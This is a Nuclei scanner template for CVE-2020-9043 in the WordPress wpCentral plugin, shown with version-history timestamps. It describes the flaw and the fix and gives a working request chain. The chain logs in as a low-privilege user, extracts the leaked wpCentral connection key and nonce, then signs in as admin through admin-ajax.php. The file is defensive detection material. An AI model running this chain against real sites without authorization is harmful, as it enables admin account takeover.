nuclei-templates/http/cves/2020/CVE-2020-9043.yaml

80 lines
2.7 KiB
YAML
Raw Permalink Normal View History

2022-07-23 14:45:35 +00:00
id: CVE-2020-9043
info:
name: WordPress wpCentral <1.5.1 - Information Disclosure
2022-07-23 14:45:35 +00:00
author: scent2d
severity: high
2022-07-23 16:22:07 +00:00
description: |
WordPress wpCentral plugin before 1.5.1 is susceptible to information disclosure. An attacker can access the connection key for WordPress Admin account and thus potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
2023-09-27 15:51:13 +00:00
impact: |
An attacker can exploit this vulnerability to gain sensitive information from the wpCentral plugin.
2023-09-06 12:22:36 +00:00
remediation: |
Update the wpCentral plugin to version 1.5.1 or later to fix the information disclosure vulnerability.
2022-07-23 14:45:35 +00:00
reference:
- https://wpscan.com/vulnerability/10074
- https://www.wordfence.com/blog/2020/02/vulnerability-in-wpcentral-plugin-leads-to-privilege-escalation/
2022-07-23 16:22:07 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9043
- https://wordpress.org/plugins/wp-central/#developers
- https://nvd.nist.gov/vuln/detail/CVE-2020-9043
2022-07-23 14:45:35 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
2022-07-23 14:45:35 +00:00
cvss-score: 8.8
cve-id: CVE-2020-9043
cwe-id: CWE-200
2023-08-31 11:46:18 +00:00
epss-score: 0.04173
epss-percentile: 0.91333
2023-09-06 12:22:36 +00:00
cpe: cpe:2.3:a:wpcentral:wpcentral:*:*:*:*:*:wordpress:*:*
2022-07-23 16:30:56 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:22:36 +00:00
max-request: 4
2023-07-11 19:49:27 +00:00
vendor: wpcentral
product: wpcentral
2023-09-06 12:22:36 +00:00
framework: wordpress
2024-01-14 09:21:50 +00:00
tags: cve,cve2020,wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan
2022-07-23 14:45:35 +00:00
http:
2022-07-23 14:45:35 +00:00
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/index.php HTTP/1.1
Host: {{Hostname}}
2022-07-24 17:21:53 +00:00
- |
GET /wp-login.php?action=logout&_wpnonce={{nonce}} HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-admin/admin-ajax.php?action=my_wpc_signon&auth_key={{authkey}} HTTP/1.1
Host: {{Hostname}}
2023-07-11 19:49:27 +00:00
host-redirects: true
max-redirects: 2
2022-07-23 14:45:35 +00:00
matchers:
2022-07-23 16:22:07 +00:00
- type: dsl
dsl:
- "contains(header_4, 'text/html')"
2022-07-24 17:21:53 +00:00
- "status_code_4 == 200"
- "contains(body_4, 'wpCentral Connection Key')"
- contains(body_4, "pagenow = \'dashboard\'")
2022-07-23 16:22:07 +00:00
condition: and
2022-07-23 14:45:35 +00:00
2022-07-23 16:22:07 +00:00
extractors:
- type: regex
2022-07-24 17:21:53 +00:00
name: authkey
2022-07-23 16:22:07 +00:00
group: 1
regex:
- 'style="word-wrap:break-word;">([a-z0-9]+)'
2022-07-24 17:21:53 +00:00
internal: true
2023-07-11 19:49:27 +00:00
part: body
2022-07-24 17:21:53 +00:00
- type: regex
name: nonce
group: 1
regex:
- '_wpnonce=([0-9a-z]+)'
internal: true
2023-07-11 19:49:27 +00:00
part: body
# digest: 490a0046304402204bffb24bf04e56aff7c5c70589b7ecbf9c04db1c030e793573251a9f104c2e1d02207a1cb6691600aaceae61e38e6ec3a9e54d43209ae9a6a254ab763e9a2b031198:922c64590222798bb761d5b6d8e72950